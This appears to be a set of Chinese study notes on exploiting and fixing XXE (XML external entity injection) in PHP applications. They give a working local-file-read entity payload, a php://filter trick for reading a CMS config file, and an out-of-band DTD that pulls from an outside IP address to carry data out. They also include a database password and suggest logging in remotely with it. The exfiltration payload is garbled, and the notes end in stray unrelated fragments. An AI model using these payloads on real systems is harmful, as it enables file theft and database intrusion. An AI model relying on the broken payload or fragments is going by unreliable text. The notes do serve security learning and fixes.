XXE的危害和SSRF有点像
XXE = XML外部实体注入 (被各种后端脚本调用)
=>XML(存数据不会做任何事情)(像html|传输数据|无预定义)
=>外部实体()
=>注入 [用户输入的资料被当做代码进行执行]
预定义:(预先定义好的东西)
var_dump() 查看数据类型?
eval() 可以命令执行?
echo 他允许输出?
前端代码:
<b></b> 加粗
<h1></h1> 大标题
XML:
<b></b> 名字而已
<h1></h1>
XML:是一个纯文本 存储信息(可以自己发明标签)
<?xml version="1.0"?> 1.0版本
DTD(通过特殊的命令去其他文件读取信息)
SYSTEM
XML部分
引用(1.txt) 包含(include) 目的处理代码冗余
mysqli_connect();
mysqli_query();
mysqli_close();
危害:
XXE 许可通过dtd去读取、访问其他资料或者网站
实体 => 变量 调用变量&实体名;
<!DOCTYPE scan [
<!ENTITY test SYSTEM "file:///c:/1.txt">]> DTD部分
将c的1.txt文件放入test中
<scan>&test;</scan> XML部分
simplexml_load_string() // 读取字符串当作xml执行
simplexml_load_file() // 读取文件当作 xml执行
<?php $test = '<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///c:/1.txt">]><scan>&test;</scan>'; $obj = simplexml_load_string($test, 'SimpleXMLElement', LIBXML_NOENT); print_r($obj); ?>
变量test里面是XML 随后试用simplexml_load_string将其转化为对象,第一个参数是xml语句,SimpleXMLElement是调用了SimpleXMLElement该类,然后LIBXML_NOENT是替代实体,然后他去执行了file协议去读取我的文件
XSS平台:
你打XSS到目标站点 -> 有人访问后把数据传到平台 -> 记录下来,等你来看
XML: 请求一个你自己搭建的php档案,其他的文件。(你想要的材料给带出来)
php文件记录请求的传参内容(记录文件)
等你去看就可以了
没有回显,外带出来:
1、获取信息
2、发送信息
file:/// 正常情况下,网站不应该使用的协议
PHP伪协议(PHP的内部协议)
php://filter/read=convert.base64-encode/resource=a.txt
如何寻找XXE:
通过1、看到数据包莫名其妙传递、返回XML代码能够试试
2、代码审计
代码审计:
1、静态审计(纯看)
2、动态审计(网站运行起来,然后经过一些特殊手法,去追踪具体的代码流程)
3、小技巧:依靠静态看代码,然后不用动态调试软件,直接修改源码进行动态调试
有些代码会被引用几百次 如何确定这段是否搭建 加入相关语句 看页面回显 有回显就是执行了 没有回显就是没执行
静态:
1、全文通读(可拿bluecms练习)
2、危险函数定位 eval() mysqli_query(
$GLOBALS['HTTP_RAW_POST_DATA'] => 获取POST原始数据 (form表单)
<?xml:version="1.0">
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=C:/phpstudy
scms/conn/conn.php">
8 remote SYsTEM "http://59.63.200.79:8014/xxe/1.xml">
<!ENTITY
&remote;
&send;]>
使用时更改红色就对路径
有的网站可能开了3306 远程数据库连接 即可用xml实体漏洞爆出的密码连接
<?php
error_reporting(E_ALL ^ E_NOTICE);
header("content-type:text/html;charset=utf-8");
session_start();
$conn = mysqli_connect("192.168.0.10","xxe", "teiwo!8#7ERe1DPC", "scms");
md5 => 明文能转密文 密文不能转明文 (e99d2e51cbefe75251f1d40821e07a32)
1.48
修复XXE:
1、libxml_disable_entity_loader(true); PHP的(禁止加载XML实体)
2、过滤SYSTEM关键字
总结:
1、XXE => XML外部实体注入 (目标执行了大家提交的XML代码)
2、XXE代码层(套)
3、危害 => SSRF 差不多
4、回显问题 => 2步走的方法外带出来
5、如何找这个漏洞(1、看到传参或者返回包出现xml 2、代码审计)
6、代码审计(动态、静态[全文、危险函数]、小技巧)
7、seay工具(全文搜索,定位函数)
8、本地测试,最好可以开一个全新环境,以免出疑问
9、以前存在的漏洞,去看了之后行尝试去找新的漏洞(查看补丁)
)
 + MQB Authorization)
 - 实践)
设计规则检查设置)
